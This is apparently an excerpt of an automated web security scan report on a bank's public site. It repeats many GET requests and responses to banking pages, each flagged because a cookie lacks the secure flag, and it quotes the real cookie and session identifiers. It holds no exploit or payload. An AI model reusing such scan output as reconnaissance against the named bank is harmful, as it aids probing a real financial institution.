GET /personal_banking/email_starting_net.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/email_starting_net.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 178
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/email_starting_net.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/everyday_banking.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/everyday_banking.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 176
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/everyday_banking.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/get_started_online_statements.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/get_started_online_statements.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 189
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/get_started_online_statements.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/home_equity_main.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/home_equity_main.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 176
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/home_equity_main.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/insurance.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/insurance.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 169
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/insurance.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/investing.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/investing.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 169
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/investing.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/loan_payment_hardship.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/loan_payment_hardship.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 181
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/loan_payment_hardship.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/loans_credit.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/loans_credit.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 172
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/loans_credit.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/mobile_banking.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/mobile_banking.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 174
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/mobile_banking.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/money_market_main.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/money_market_main.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 177
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/money_market_main.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/morgan_keegan.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/morgan_keegan.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 173
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/morgan_keegan.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/open_account.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/open_account.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 172
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/open_account.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/platinum_visa_check.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/platinum_visa_check.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 179
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/platinum_visa_check.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/private_client.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/private_client.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 174
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/private_client.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/regionsnet.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/regionsnet.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 170
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/regionsnet.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/regionsnet_bill_pay.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/regionsnet_bill_pay.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 179
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/regionsnet_bill_pay.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/retirement_planning.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/retirement_planning.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 179
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/retirement_planning.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/savings_cds.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/savings_cds.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 171
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/savings_cds.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/trust_asset.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/trust_asset.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 171
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/trust_asset.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /small_business.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 200 OK Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 24375
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><titl ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /system/gateway.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/system/gateway.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 157
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/system/gateway.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /templateOverview.aspx HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 200 OK Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 25921
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><titl ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /virtualMedia/img2297.gif HTTP/1.1 Host: www.regions.com Connection: keep-alive Referer: https://www.regions.com/personal_banking.rf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910
Response
HTTP/1.1 200 OK Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Content-Length: 5484 Content-Type: image/gif Last-Modified: Mon, 07 Jun 2010 17:39:23 GMT Accept-Ranges: bytes ETag: "20c8e25d686cb1:7c0f" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 15:49:18 GMT
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /virtualMedia/img2608.gif HTTP/1.1 Host: www.regions.com Connection: keep-alive Referer: https://www.regions.com/personal_banking.rf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910
Response
HTTP/1.1 200 OK Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Content-Length: 4948 Content-Type: image/gif Last-Modified: Tue, 26 Oct 2010 17:36:44 GMT Accept-Ranges: bytes ETag: "b0b6855b3475cb1:7c0f" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 15:49:18 GMT
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /virtualMedia/img2853.jpg HTTP/1.1 Host: www.regions.com Connection: keep-alive Referer: https://www.regions.com/personal_banking.rf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910
Response
HTTP/1.1 200 OK Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Content-Length: 28854 Content-Type: image/jpeg Last-Modified: Wed, 26 Jan 2011 15:40:17 GMT Accept-Ranges: bytes ETag: "60c215556fbdcb1:7c0f" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 15:49:17 GMT
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /virtualMedia/img2859.gif HTTP/1.1 Host: www.regions.com Connection: keep-alive Referer: https://www.regions.com/personal_banking.rf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910
Response
HTTP/1.1 200 OK Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Content-Length: 3492 Content-Type: image/gif Last-Modified: Thu, 27 Jan 2011 15:21:16 GMT Accept-Ranges: bytes ETag: "a044d735becb1:7c0f" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 15:49:17 GMT
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
